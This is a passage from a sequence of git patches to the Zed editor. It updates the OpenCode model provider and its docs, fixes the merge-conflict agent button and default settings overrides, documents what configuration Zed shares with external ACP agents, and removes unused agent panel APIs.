"MiMo V2 Pro Free", - Self::MimoV2OmniFree => "MiMo V2 Omni Free", - Self::MimoV2FlashFree => "MiMo V2 Flash Free", - Self::TrinityLargePreviewFree => "Trinity Large Preview Free", + Self::KimiK2_6 => "Kimi K2.6", + Self::MiniMaxM2_7 => "MiniMax M2.7", + Self::MimoV2Pro => "MiMo V2 Pro", + Self::MimoV2Omni => "MiMo V2 Omni", + Self::Qwen3_5Plus => "Qwen3.5 Plus", + Self::Qwen3_6Plus => "Qwen3.6 Plus", Self::BigPickle => "Big Pickle", Self::Nemotron3SuperFree => "Nemotron 3 Super Free", @@ -211,8 +301,18 @@ impl Model { } } - pub fn protocol(&self) -> ApiProtocol { + pub fn protocol(&self, subscription: OpenCodeSubscription) -> ApiProtocol { match self { + // Models offered by OpenCode have the same configuration across subscriptions + // with one outlier: non-free MiniMax models + Self::MiniMaxM2_7 | Self::MiniMaxM2_5 => { + if subscription == 
OpenCodeSubscription::Zen { + ApiProtocol::OpenAiChat + } else { + ApiProtocol::Anthropic + } + } + Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 | Self::ClaudeOpus4_5 @@ -241,14 +341,15 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, - Self::MiniMaxM2_5 - | Self::MiniMaxM2_5Free + Self::MiniMaxM2_5Free | Self::Glm5 + | Self::Glm5_1 | Self::KimiK2_5 - | Self::MimoV2ProFree - | Self::MimoV2OmniFree - | Self::MimoV2FlashFree - | Self::TrinityLargePreviewFree + | Self::KimiK2_6 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus | Self::BigPickle | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, @@ -259,10 +360,12 @@ impl Model { pub fn max_token_count(&self) -> u64 { match self { // Anthropic models - Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, - Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000, + Self::ClaudeOpus4_7 => 1_000_000, + Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, + Self::ClaudeSonnet4_5 => 1_000_000, + Self::ClaudeOpus4_5 | Self::ClaudeHaiku4_5 => 200_000, Self::ClaudeOpus4_1 => 200_000, - Self::ClaudeHaiku4_5 => 200_000, + Self::ClaudeSonnet4 => 1_000_000, Self::Claude3_5Haiku => 200_000, // OpenAI models @@ -281,14 +384,15 @@ impl Model { Self::Gemini3Flash => 1_048_576, // OpenAI-compatible models - Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608, - Self::Glm5 => 200_000, - Self::KimiK2_5 => 262_144, - Self::MimoV2ProFree => 1_048_576, - Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144, - Self::TrinityLargePreviewFree => 131_072, + Self::MiniMaxM2_7 => 204_800, + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 204_800, + Self::Glm5 | Self::Glm5_1 => 204_800, + Self::KimiK2_6 | Self::KimiK2_5 => 262_144, + Self::MimoV2Pro => 1_048_576, + Self::MimoV2Omni => 262_144, + Self::Qwen3_5Plus | Self::Qwen3_6Plus => 262_144, Self::BigPickle => 200_000, - Self::Nemotron3SuperFree => 262_144, + 
Self::Nemotron3SuperFree => 204_800, Self::Custom { max_tokens, .. } => *max_tokens, } @@ -298,12 +402,12 @@ impl Model { match self { // Anthropic models Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 => Some(128_000), - Self::ClaudeSonnet4_6 => Some(64_000), Self::ClaudeOpus4_5 - | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 | Self::ClaudeSonnet4_5 - | Self::ClaudeSonnet4 - | Self::ClaudeHaiku4_5 => Some(64_000), + | Self::ClaudeHaiku4_5 + | Self::ClaudeSonnet4 => Some(64_000), + Self::ClaudeOpus4_1 => Some(32_000), Self::Claude3_5Haiku => Some(8_192), // OpenAI models @@ -327,12 +431,14 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), // OpenAI-compatible models - Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536), - Self::Glm5 | Self::BigPickle => Some(128_000), - Self::KimiK2_5 => Some(65_536), - Self::MimoV2ProFree => Some(131_072), - Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536), - Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384), + Self::MiniMaxM2_7 => Some(131_072), + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), + Self::Glm5 | Self::Glm5_1 => Some(131_072), + Self::BigPickle => Some(128_000), + Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), + Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), + Self::Nemotron3SuperFree => Some(128_000), + Self::MimoV2Pro | Self::MimoV2Omni => Some(64_000), Self::Custom { max_output_tokens, .. 
@@ -377,15 +483,20 @@ impl Model { // Google models support images Self::Gemini3_1Pro | Self::Gemini3Flash => true, - // OpenAI-compatible models — conservative default + // OpenAI-compatible models with image support + Self::KimiK2_6 + | Self::KimiK2_5 + | Self::MimoV2Omni + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus => true, + + // OpenAI-compatible models without image support Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free | Self::Glm5 - | Self::KimiK2_5 - | Self::MimoV2ProFree - | Self::MimoV2OmniFree - | Self::MimoV2FlashFree - | Self::TrinityLargePreviewFree + | Self::Glm5_1 + | Self::MiniMaxM2_7 + | Self::MimoV2Pro | Self::BigPickle | Self::Nemotron3SuperFree => false, @@ -400,12 +511,12 @@ impl Model { } } -/// Stream generate content for Google models via OpenCode Zen. +/// Stream generate content for Google models via OpenCode. /// /// Unlike `google_ai::stream_generate_content()`, this uses: /// - `/v1/models/{model}` path (not `/v1beta/models/{model}`) /// - `Authorization: Bearer` header (not `key=` query param) -pub async fn stream_generate_content_zen( +pub async fn stream_generate_content( client: &dyn HttpClient, api_url: &str, api_key: &str, @@ -451,7 +562,7 @@ pub async fn stream_generate_content_zen( let mut text = String::new(); response.body_mut().read_to_string(&mut text).await?; Err(anyhow!( - "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}", + "error during streamGenerateContent via OpenCode, status code: {:?}, body: {}", response.status(), text )) diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index c14f854a724ce6..1a16c5264a70bd 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -150,6 +150,20 @@ impl Default for KeepAlive { pub struct OpenCodeSettingsContent { pub api_url: Option, pub available_models: Option>, + /// Whether to show OpenCode Zen models. Defaults to true. 
+ pub show_zen_models: Option, + /// Whether to show OpenCode Go models. Defaults to true. + pub show_go_models: Option, + /// Whether to show OpenCode Free models. Defaults to true. + pub show_free_models: Option, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema, MergeFrom)] +#[serde(rename_all = "snake_case")] +pub enum OpenCodeModelSubscription { + Zen, + Go, + Free, } #[with_fallible_options] @@ -161,6 +175,10 @@ pub struct OpenCodeAvailableModel { pub max_output_tokens: Option, /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google". pub protocol: String, + /// The subscription for this model: "zen", "go", or "free". Defaults to Zen. + pub subscription: Option, + /// Custom Model API URL to use for this model. + pub custom_model_api_url: Option, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index 92c490a05d2031..ec217ff081351f 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -31,6 +31,7 @@ Zed supports these providers with your own API keys: - [Ollama](#ollama) - [OpenAI](#openai) - [OpenAI API Compatible](#openai-api-compatible) +- [OpenCode](#opencode) - [OpenRouter](#openrouter) - [Vercel AI Gateway](#vercel-ai-gateway) - [Vercel](#vercel-v0) @@ -614,6 +615,74 @@ If a provider exposes models that only work with the Responses API, set `chat_co Note that LLM API keys aren't stored in your settings file. So, ensure you have it set in your environment variables (`_API_KEY=`) so your settings can pick it up. In the example above, it would be `TOGETHER_AI_API_KEY=`. 
+### OpenCode {#opencode} + +OpenCode offers multiple ways to access AI models: + +- [OpenCode Zen](https://opencode.ai/zen/): a pay-as-you-go subscription with access to a large number of tested and verified models +- [OpenCode Zen Free](https://opencode.ai/docs/zen/#pricing): free access to a limited set of models, with data and feedback collected to improve the models +- [OpenCode Go](https://opencode.ai/go): a low-cost monthly subscription with access to a validated set of open coding models + +1. Visit [OpenCode Console](https://opencode.ai/auth) and create an account +2. Free models are available without payment. To use Zen or Go models, make sure you have enough credits or an active subscription +3. Generate an API key from the "API Keys" section in the OpenCode Console +4. Open the settings view (`agent: open settings`) and go to the OpenCode section +5. Enter your OpenCode API key + +The OpenCode API key will be saved in your keychain. + +Zed will also use the `OPENCODE_API_KEY` environment variable if it's defined. + +By default, models from all subscription types are shown. Optionally, you can hide subscriptions that are not relevant to you by clicking the toggles or by adding the following to your settings: + +```json [settings] +{ + "language_models": { + "opencode": { + "show_zen_models": true, + "show_go_models": false, + "show_free_models": false + } + } +} +``` + +#### Custom Models {#opencode-custom-models} + +The Zed agent comes pre-configured with OpenCode models. 
If you wish to use newer models or models with custom endpoints, you can do so by adding the following to your Zed settings file ([how to edit](../configuring-zed.md#settings-files)): + +```json [settings] +{ + "language_models": { + "opencode": { + "available_models": [ + { + "name": "my-custom-model", + "display_name": "My Custom Model", + "max_tokens": 123456, + "max_output_tokens": 98765, + "protocol": "openai_chat", + "subscription": "go", + "custom_model_api_url": "https://example.com/zen" + } + ] + } + } +} +``` + +The available configuration options for custom models are: + +- `name` (required): model id used by OpenCode, for example `glm-9000` +- `display_name` (optional): human-readable model name shown in the UI, for example `Custom GLM 9000` +- `max_tokens` (required): maximum model context window size, for example `1000000` +- `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` +- `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` +- `subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) +- `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API + +Custom models will be listed in the model dropdown in the Agent Panel. + ### OpenRouter {#openrouter} OpenRouter provides access to multiple AI models through a single API. It supports tool use for compatible models. From 0d0d86d75cba09af9f59e1a2fcbf0bf81a9ace57 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 11:41:44 -0300 Subject: [PATCH 020/231] Fix when agent-powered merge conflict button shows up (#54791) This PR fixes the logic to dismiss the "resolve merge conflict with agent" button. Previously, we were just observing `merge_heads_by_conflicted_path`, which seems to be intentionally sticky, preserving the conflicted paths until changes are either committed or aborted. 
This would make the button to resolve conflicts show up even _after_ the changes get resolved. Now, we're checking whether paths are _currently_ conflicted (`is_conflicted()`), and if they are not, we don't display the button, even though the resolution might have not been committed or aborted yet. As a bonus, in this PR, I'm also putting the resolve conflict button _before_ the activity indicator, so as to avoid bounciness, and did a quick polish of the activity indicator button itself, by using the `Button` component. Release Notes: - Fixed a bug with the merge conflict "resolve with agent" button where it would be displayed even though all conflicts have already been resolved. --- .../src/activity_indicator.rs | 71 +++++++++---------- crates/git_ui/src/conflict_view.rs | 6 ++ crates/zed/src/zed.rs | 2 +- 3 files changed, 39 insertions(+), 40 deletions(-) diff --git a/crates/activity_indicator/src/activity_indicator.rs b/crates/activity_indicator/src/activity_indicator.rs index 5f4e25b5ccd40c..7aa5b91a4c2f7f 100644 --- a/crates/activity_indicator/src/activity_indicator.rs +++ b/crates/activity_indicator/src/activity_indicator.rs @@ -3,8 +3,8 @@ use editor::Editor; use extension_host::{ExtensionOperation, ExtensionStore}; use futures::StreamExt; use gpui::{ - App, Context, CursorStyle, Entity, EventEmitter, InteractiveElement as _, ParentElement as _, - Render, SharedString, StatefulInteractiveElement, Styled, Window, actions, + App, Context, Entity, EventEmitter, InteractiveElement as _, ParentElement as _, Render, + SharedString, Styled, Window, actions, }; use language::{ BinaryStatus, LanguageRegistry, LanguageServerId, LanguageServerName, @@ -22,10 +22,7 @@ use std::{ sync::Arc, time::{Duration, Instant}, }; -use ui::{ - ButtonLike, CommonAnimationExt, ContextMenu, PopoverMenu, PopoverMenuHandle, Tooltip, - prelude::*, -}; +use ui::{CommonAnimationExt, ContextMenu, PopoverMenu, PopoverMenuHandle, Tooltip, prelude::*}; use util::truncate_and_trailoff; use 
workspace::{StatusItemView, Workspace, item::ItemHandle}; @@ -720,43 +717,39 @@ impl Render for ActivityIndicator { }; let activity_indicator = cx.entity().downgrade(); let truncate_content = content.message.len() > MAX_MESSAGE_LEN; + result.gap_2().child( PopoverMenu::new("activity-indicator-popover") .trigger( - ButtonLike::new("activity-indicator-trigger").child( - h_flex() - .id("activity-indicator-status") - .gap_2() - .children(content.icon) - .map(|button| { - if truncate_content { - button - .child( - Label::new(truncate_and_trailoff( - &content.message, - MAX_MESSAGE_LEN, - )) - .size(LabelSize::Small), - ) - .tooltip(Tooltip::text(content.message)) - } else { - button - .child(Label::new(content.message).size(LabelSize::Small)) - .when_some( - content.tooltip_message, - |this, tooltip_message| { - this.tooltip(Tooltip::text(tooltip_message)) - }, - ) - } + Button::new("activity-indicator-trigger", { + if truncate_content { + truncate_and_trailoff(&content.message, MAX_MESSAGE_LEN) + } else { + content.message.clone() + } + }) + .label_size(LabelSize::Small) + .when(content.icon.is_some(), |this| { + this.start_icon( + Icon::new(IconName::LoadCircle) + .color(Color::Muted) + .size(IconSize::Small), + ) + }) + .map(|button| { + if truncate_content { + button.tooltip(Tooltip::text(content.message)) + } else { + button.when_some(content.tooltip_message, |this, tooltip_message| { + this.tooltip(Tooltip::text(tooltip_message)) }) - .when_some(content.on_click, |this, handler| { - this.on_click(cx.listener(move |this, _, window, cx| { - handler(this, window, cx); - })) - .cursor(CursorStyle::PointingHand) - }), - ), + } + }) + .when_some(content.on_click, |this, handler| { + this.on_click(cx.listener(move |this, _, window, cx| { + handler(this, window, cx); + })) + }), ) .anchor(gpui::Anchor::BottomLeft) .menu(move |window, cx| { diff --git a/crates/git_ui/src/conflict_view.rs b/crates/git_ui/src/conflict_view.rs index 25175dce481637..d5c5fe02bfe5b5 100644 --- 
a/crates/git_ui/src/conflict_view.rs +++ b/crates/git_ui/src/conflict_view.rs @@ -418,6 +418,12 @@ fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec { for repo in git_store.repositories().values() { let snapshot = repo.read(cx).snapshot(); for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() { + let is_currently_conflicted = snapshot + .status_for_path(repo_path) + .is_some_and(|entry| entry.status.is_conflicted()); + if !is_currently_conflicted { + continue; + } if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) { paths.push( project_path diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index f25f20b26baaaa..6d1a9c176f1193 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -573,8 +573,8 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { status_bar.add_left_item(lsp_button, window, cx); status_bar.add_left_item(diagnostic_summary, window, cx); status_bar.add_left_item(active_file_name, window, cx); - status_bar.add_left_item(activity_indicator, window, cx); status_bar.add_left_item(merge_conflict_indicator, window, cx); + status_bar.add_left_item(activity_indicator, window, cx); status_bar.add_right_item(edit_prediction_ui, window, cx); status_bar.add_right_item(active_buffer_encoding, window, cx); status_bar.add_right_item(active_buffer_language, window, cx); From e979679fd38493371f5375192b414f14cce7d9ed Mon Sep 17 00:00:00 2001 From: morgankrey Date: Fri, 24 Apr 2026 10:04:03 -0500 Subject: [PATCH 021/231] docs: Document configuration boundaries for external agents (#54759) ## Summary - Add a new "Configuration Boundaries" section to the external agents documentation explaining what settings are shared between Zed and ACP agents - Clarify bidirectional configuration story: what Zed forwards to agents AND what agents inherit from native installations - Add troubleshooting section for common user confusion points - Update MCP docs with clearer cross-links 
## Context Users are confused about which Zed settings apply to external ACP agents like Claude and Codex. Common questions: - "I configured MCP in Zed but Claude can't see it" - "My Codex config.toml isn't being used" - "Do profiles apply to external agents?" ## Key Points **What Zed forwards to ACP agents:** - Model/mode selection, env vars, MCP servers (with limitations), CLAUDE.md **What's NOT forwarded:** - Profiles, tool permissions settings, `.rules` files **What agents DON'T inherit from native installations:** - `~/.claude/` config, `~/.codex/config.toml`, native MCP servers, authentication state ## Test plan - [x] Review for technical accuracy against codebase - [x] Check brand voice compliance Release Notes: - N/A --- docs/src/ai/external-agents.md | 101 ++++++++++++++++++++++++++++++++- docs/src/ai/mcp.md | 5 +- 2 files changed, 100 insertions(+), 6 deletions(-) diff --git a/docs/src/ai/external-agents.md b/docs/src/ai/external-agents.md index dc3b246f34f28a..454079c2d26793 100644 --- a/docs/src/ai/external-agents.md +++ b/docs/src/ai/external-agents.md @@ -253,7 +253,102 @@ This lets you see the messages being sent and received between Zed and the agent It's helpful to attach data from this view if you're opening issues about problems with external agents like Claude Agent, Codex, OpenCode, etc. -## MCP Servers +## Configuration Boundaries {#configuration-boundaries} -Note that for external agents, access to MCP servers [installed from Zed](./mcp.md) may vary depending on the ACP implementation. -For example, Claude Agent and Codex both support it, but Gemini CLI does not yet. +External agents run as separate processes that communicate with Zed via the [Agent Client Protocol (ACP)](https://agentclientprotocol.com). This creates important boundaries between Zed's configuration and the agent's native configuration. 
+ +### What Zed Forwards to External Agents + +When you start an external agent thread, Zed sends: + +| Setting | How to Configure | +| --------------------- | --------------------------------------------------------------------- | +| Model selection | `agent_servers..default_model` in settings | +| Mode selection | `agent_servers..default_mode` in settings | +| Environment variables | `agent_servers..env` in settings | +| MCP servers | `context_servers` in settings (see [limitations](#mcp-server-access)) | +| Working directory | Automatically set to project root | + +**Not forwarded:** + +- [Profiles](./agent-panel.md#profiles) — profiles only apply to Zed's first-party agent +- [Tool permissions](./tool-permissions.md) settings — external agents request permissions at runtime via UI prompts +- Rules files — Zed's [rules system](./rules.md) only applies to Zed's first-party agent (external agents read their own rules files directly) + +### What External Agents Read Directly {#native-config} + +External agents run as CLI tools with full filesystem access. They read their own configuration files directly — Zed doesn't forward or block these. + +#### Claude Agent + +Claude Agent runs Claude Code under the hood, which reads its standard configuration: + +| Config | Read by Claude Agent? 
| +| ----------------------------------- | ----------------------------------------------------------------- | +| `~/.claude/` directory | Yes — Claude Code reads its own settings and memory | +| CLAUDE.md files | Yes — Claude Code reads these directly from the project | +| Skills | Yes — exposed via the Claude Agent SDK | +| MCP servers from Claude Code config | Yes — but Zed also forwards its own MCP servers via ACP | +| Hooks | No — [not supported](https://code.claude.com/docs/en/hooks-guide) | +| Authentication | Separate — you must authenticate via `/login` in Zed | + +> **Why separate authentication?** Zed isolates Claude Agent authentication to give you control over which account and billing method you use. + +#### Codex + +Codex runs the Codex CLI under the hood, which reads its standard configuration: + +| Config | Read by Codex? | +| ----------------------------- | ----------------------------------------------- | +| `~/.codex/config.toml` | Yes — Codex CLI reads its own config | +| MCP servers from Codex config | Yes — but Zed also forwards its own MCP servers | +| `CODEX_API_KEY` env var | Yes — inherited from your shell environment | +| `OPENAI_API_KEY` env var | Yes — inherited from your shell environment | +| ChatGPT OAuth login | Separate — you must re-authenticate in Zed | + +You can also pass environment variables through Zed settings: + +```json [settings] +{ + "agent_servers": { + "codex-acp": { + "type": "registry", + "env": { + "CODEX_API_KEY": "your-key", + "CUSTOM_PROVIDER_URL": "https://..." + } + } + } +} +``` + +### MCP Server Access {#mcp-server-access} + +MCP servers configured in Zed's `context_servers` are forwarded to Claude Agent and Codex via the ACP protocol. 
+ +- **Local stdio-based MCP servers:** Work reliably +- **Remote MCP servers with OAuth:** May have issues ([#54410](https://github.com/zed-industries/zed/issues/54410)) + +External agents can access MCP servers from two sources: Zed's `context_servers` (forwarded via ACP) and their own native configuration files (`~/.claude/`, `~/.codex/config.toml`). + +For more on configuring MCP servers, see [Model Context Protocol](./mcp.md). + +### Troubleshooting {#troubleshooting} + +**"I enabled MCP tools in Zed but the agent can't see them"** + +1. Verify the MCP server is enabled in `context_servers` settings +2. For remote MCP servers with OAuth, this is a [known issue](https://github.com/zed-industries/zed/issues/54410) — try local stdio-based servers instead +3. Open `dev: open acp logs` from the Command Palette to debug + +**"My existing Claude Code / Codex setup isn't working in Zed"** + +External agents read their own config files, but authentication is handled separately: + +1. Re-authenticate via `/login` (Claude Agent) or the authentication prompt (Codex) +2. Your existing MCP servers and settings from `~/.claude/` or `~/.codex/config.toml` should work +3. You can also configure additional settings via `agent_servers..env` in Zed + +**"Profiles don't affect my external agent"** + +Correct — [profiles](./agent-panel.md#profiles) only apply to Zed's first-party agent. External agents have their own tool sets and don't use Zed's profile system. diff --git a/docs/src/ai/mcp.md b/docs/src/ai/mcp.md index 96ef71e683c010..dbe2f10af039f8 100644 --- a/docs/src/ai/mcp.md +++ b/docs/src/ai/mcp.md @@ -157,10 +157,9 @@ Learn more about [how tool permissions work](./tool-permissions.md), how to furt ### External Agents -Note that for [external agents](./external-agents.md) connected through the [Agent Client Protocol](https://agentclientprotocol.com/), access to MCP servers installed from Zed may vary depending on the ACP agent implementation. 
+MCP servers configured in Zed are forwarded to [external agents](./external-agents.md) via the [Agent Client Protocol](https://agentclientprotocol.com/). External agents can also access MCP servers from their own native configuration files. -Regarding the built-in ones, Claude Agent and Codex both support it, and Gemini CLI does not yet. -In the meantime, learn how to add MCP server support to Gemini CLI through [their documentation](https://github.com/google-gemini/gemini-cli?tab=readme-ov-file#using-mcp-servers). +For details on what configuration is shared between Zed and external agents, see [Configuration Boundaries](./external-agents.md#configuration-boundaries). ### Error Handling From 034a78de4e7224cf9aed87b29394db37a58d60cb Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 18:05:52 +0300 Subject: [PATCH 022/231] Fix default.json profile and os settings not applying on startup (#54635) When started working on "disable the profiler for all but Nightly and Dev" users, I've tried to do that using the default OS settings and discovered that those are ignored. 
Release Notes: - Fixed default.json profile and os settings not applying on startup --- crates/settings/src/settings_store.rs | 51 ++++++++++++++++++++++----- 1 file changed, 43 insertions(+), 8 deletions(-) diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 9215a53760b626..0eb6a32465bbe9 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -286,13 +286,8 @@ pub struct SettingsJsonSchemaParams<'a> { impl SettingsStore { pub fn new(cx: &mut App, default_settings: &str) -> Self { - Self::new_with_semantic_tokens(cx, default_settings) - } - - pub fn new_with_semantic_tokens(cx: &mut App, default_settings: &str) -> Self { let (setting_file_updates_tx, mut setting_file_updates_rx) = mpsc::unbounded(); - let default_settings: SettingsContent = - SettingsContent::parse_json_with_comments(default_settings).unwrap(); + let default_settings = Self::parse_default_settings(default_settings).unwrap(); if !cx.has_global::() { cx.set_global::( crate::parse_json_with_comments::( @@ -897,12 +892,25 @@ impl SettingsStore { default_settings_content: &str, cx: &mut App, ) -> Result<()> { - self.default_settings = - SettingsContent::parse_json_with_comments(default_settings_content)?.into(); + self.default_settings = Self::parse_default_settings(default_settings_content)?.into(); self.recompute_values(None, cx); Ok(()) } + /// Parses the default settings JSON and folds any `dev`/`nightly`/`preview`/`stable` + /// release-channel overrides and `macos`/`linux`/`windows` platform overrides into + /// the returned [`SettingsContent`]. + /// + /// Unlike user settings, default settings are used directly as the base for all + /// merges, so overrides must be resolved up front. 
+ fn parse_default_settings(default_settings: &str) -> Result { + let parsed = UserSettingsContent::parse_json_with_comments(default_settings)?; + let mut merged = (*parsed.content).clone(); + merged.merge_from_option(parsed.for_release_channel()); + merged.merge_from_option(parsed.for_os()); + Ok(merged) + } + /// Sets the user settings via a JSON string. #[must_use] pub fn set_user_settings( @@ -1776,6 +1784,33 @@ mod tests { ); } + #[gpui::test] + fn test_default_settings_release_channel_overrides(cx: &mut App) { + assert_eq!( + *release_channel::RELEASE_CHANNEL, + release_channel::ReleaseChannel::Dev, + "tests expect the dev release channel", + ); + + let mut defaults: serde_json::Value = + crate::parse_json_with_comments(&default_settings()).unwrap(); + let root = defaults + .as_object_mut() + .expect("default settings must be a JSON object"); + root.insert("dev".into(), serde_json::json!({ "auto_update": false })); + root.insert("stable".into(), serde_json::json!({ "auto_update": true })); + let defaults_with_overrides = serde_json::to_string(&defaults).unwrap(); + + let mut store = SettingsStore::new(cx, &defaults_with_overrides); + store.register_setting::(); + + assert_eq!( + store.get::(None), + &AutoUpdateSetting { auto_update: false }, + "dev override from default settings should apply", + ); + } + #[gpui::test] fn test_settings_store_basic(cx: &mut App) { let mut store = SettingsStore::new(cx, &default_settings()); From d8f502016d5780e80c15108d1281ed965aedc013 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 17:52:27 +0200 Subject: [PATCH 023/231] agent_ui: Remove unused APIs (#54774) Release Notes: - N/A --- crates/agent_ui/src/agent_panel.rs | 119 +----------------- crates/agent_ui/src/conversation_view.rs | 13 +- .../src/conversation_view/thread_view.rs | 43 ------- crates/agent_ui/src/inline_assistant.rs | 45 ------- crates/agent_ui/src/inline_prompt_editor.rs | 20 --- crates/agent_ui/src/mention_set.rs | 5 - 
crates/agent_ui/src/message_editor.rs | 82 +----------- 7 files changed, 7 insertions(+), 320 deletions(-) diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index 3ef0934e2deedc..e52e82120a2e49 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -74,8 +74,8 @@ use terminal::terminal_settings::TerminalSettings; use terminal_view::{TerminalView, terminal_panel::TerminalPanel}; use theme_settings::ThemeSettings; use ui::{ - Button, Callout, ContextMenu, ContextMenuEntry, IconButton, PopoverMenu, PopoverMenuHandle, - Tab, Tooltip, prelude::*, utils::WithRemSize, + Button, ContextMenu, ContextMenuEntry, IconButton, PopoverMenu, PopoverMenuHandle, Tab, + Tooltip, prelude::*, utils::WithRemSize, }; use util::ResultExt as _; use workspace::{ @@ -705,7 +705,6 @@ pub struct AgentPanel { selected_agent: Agent, _thread_view_subscription: Option, _active_thread_focus_subscription: Option, - show_trust_workspace_message: bool, _base_view_observation: Option, _draft_editor_observation: Option, _thread_metadata_store_subscription: Subscription, @@ -1063,7 +1062,6 @@ impl AgentPanel { selected_agent: Agent::default(), _thread_view_subscription: None, _active_thread_focus_subscription: None, - show_trust_workspace_message: false, new_user_onboarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed(cx)), _base_view_observation: None, _draft_editor_observation: None, @@ -1288,20 +1286,6 @@ impl AgentPanel { } } - pub fn create_thread( - &mut self, - source: &'static str, - window: &mut Window, - cx: &mut Context, - ) -> ThreadId { - let agent = self.selected_agent(cx); - let thread = self.create_agent_thread(agent, None, None, None, None, source, window, cx); - let thread_id = thread.conversation_view.read(cx).thread_id; - self.retained_threads - .insert(thread_id, thread.conversation_view); - thread_id - } - pub fn activate_retained_thread( &mut self, id: ThreadId, @@ -1320,30 +1304,6 @@ impl 
AgentPanel { ); } - pub fn remove_thread(&mut self, id: ThreadId, window: &mut Window, cx: &mut Context) { - self.retained_threads.remove(&id); - ThreadMetadataStore::global(cx).update(cx, |store, cx| { - store.delete(id, cx); - }); - - if self - .draft_thread - .as_ref() - .is_some_and(|d| d.read(cx).thread_id == id) - { - self.draft_thread = None; - self._draft_editor_observation = None; - } - - if self.active_thread_id(cx) == Some(id) { - self.clear_overlay_state(); - self.activate_draft(false, "agent_panel", window, cx); - self.serialize(cx); - cx.emit(AgentPanelEvent::ActiveViewChanged); - cx.notify(); - } - } - pub fn active_thread_id(&self, cx: &App) -> Option { match &self.base_view { BaseView::AgentThread { conversation_view } => { @@ -1374,28 +1334,6 @@ impl AgentPanel { } } - pub fn clear_editor(&self, id: ThreadId, window: &mut Window, cx: &mut Context) { - let cv = self - .retained_threads - .get(&id) - .or_else(|| match &self.base_view { - BaseView::AgentThread { conversation_view } - if conversation_view.read(cx).thread_id == id => - { - Some(conversation_view) - } - _ => None, - }); - let Some(cv) = cv else { return }; - let Some(tv) = cv.read(cx).root_thread_view() else { - return; - }; - let editor = tv.read(cx).message_editor.clone(); - editor.update(cx, |editor, cx| { - editor.clear(window, cx); - }); - } - fn new_native_agent_thread_from_summary( &mut self, action: &NewNativeAgentThreadFromSummary, @@ -2003,26 +1941,6 @@ impl AgentPanel { false } - /// active thread plus any background threads that are still running or - /// completed but unseen. 
- pub fn parent_threads(&self, cx: &App) -> Vec> { - let mut views = Vec::new(); - - if let Some(server_view) = self.active_conversation_view() { - if let Some(thread_view) = server_view.read(cx).root_thread_view() { - views.push(thread_view); - } - } - - for server_view in self.retained_threads.values() { - if let Some(thread_view) = server_view.read(cx).root_thread_view() { - views.push(thread_view); - } - } - - views - } - fn update_thread_work_dirs(&self, cx: &mut Context) { let new_work_dirs = self.project.read(cx).default_path_list(cx); let new_worktree_paths = self.project.read(cx).worktree_paths(cx); @@ -3594,38 +3512,6 @@ impl AgentPanel { } } - fn render_workspace_trust_message(&self, cx: &Context) -> Option { - if !self.show_trust_workspace_message { - return None; - } - - let description = "To protect your system, third-party code—like MCP servers—won't run until you mark this workspace as safe."; - - Some( - Callout::new() - .icon(IconName::Warning) - .severity(Severity::Warning) - .border_position(ui::BorderPosition::Bottom) - .title("You're in Restricted Mode") - .description(description) - .actions_slot( - Button::new("open-trust-modal", "Configure Project Trust") - .label_size(LabelSize::Small) - .style(ButtonStyle::Outlined) - .on_click({ - 